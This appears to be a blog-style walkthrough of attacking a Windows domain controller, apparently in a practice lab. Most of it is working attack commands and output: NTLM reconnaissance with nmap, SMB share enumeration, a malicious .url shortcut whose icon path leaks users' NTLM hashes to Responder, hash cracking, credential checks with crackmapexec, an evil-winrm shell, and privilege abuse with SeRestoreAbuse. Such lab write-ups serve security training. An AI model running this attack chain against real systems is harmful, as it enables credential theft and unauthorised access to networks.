Useful things for attacking Windows systems.
If RDP is available, NMAP can glean some super useful information with its rdp-ntlm-info NSE script.
kali@kali:~$ nmap -p 3389 --script=rdp-ntlm-info target
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 14:10 MST
Nmap scan report for target (target)
Host is up (0.068s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: TARGET
| NetBIOS_Domain_Name: TARGET
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: TARGET.local
| DNS_Computer_Name: DC.target.local
| DNS_Tree_Name: target.local
| Product_Version: 10.0.17763
|_ System_Time: 2024-12-15T21:10:22+00:00
Nmap done: 1 IP address (1 host up) scanned in 0.68 secondsIf NetBIOS and/or SMB is enabled, enum4linux is your friend. It may even be able to enumerate local users for you.
nbtscan is also useful for learning the server’s hostname.
Smbclient can be used to list and connect to SMB shares.
kali@kali:~$ smbclient -L target
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DocumentsShare Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to target failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
kali@kali:~/proving_grounds/vault$ smbclient \\\\target\\DocumentsShare
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Dec 15 13:06:46 2024
.. D 0 Sun Dec 15 13:06:46 2024
test.url A 107 Sun Dec 15 13:06:46 2024
7706623 blocks of size 4096. 1121842 blocks available
You may notice test.url in the directory listing. I created that. It’s a malicious link file. It adds a shortcut icon in the given directory. If the user views this directory, you can capture their NTLM hash with responder.
Contents of the file are as follows:
[InternetShortcut]
URL=meow
WorkingDirectory=fuckyou
IconFile=\\me\%USERNAME%.icon
IconIndex=1Speaking of responder, it’s a great tool for just capturing things on a network.
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
You can try to crack any captured hashes with hashcat’s -m 5600 option.
Once you have the username and password from that, you can use another great tool called crackmapexec to check which services those credentials can login to. This is especially useful when attacking a domain.
Note the ‘–‘ after the password. This is used to indicate there is no further input, otherwise it tries to read the target as part of the password.
You can also specify CIDR blocks such as 192.168.1.0/24.
kali@kali:~$ crackmapexec winrm -u username -p password -- target
SMB target 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:target.local)
HTTP target 5985 DC [*] http://target:5985/wsman
WINRM target 5985 DC [+] target.local\username:password (Pwn3d!)To use the stolen credentials, we turn to yet another tool called evil-winrm (evil-windows remote management).
kali@kali:~$ evil-winrm -i target -u username -p password
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents> whoami
target\username
Great, you have shell!
One of the first things to look for when you access a given system is what privileges you have on it. You can do so with the whoami command.
*Evil-WinRM* PS C:\Users\username\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Even though we’re not an administrator, some of those privilges can be abused to again administrator rights.
There are useful tools such as SeRestoreAbuse.exe (they are a pain in the ass to compile because Windows) that you can run with an argument (filepath for your reverse shell) to do this.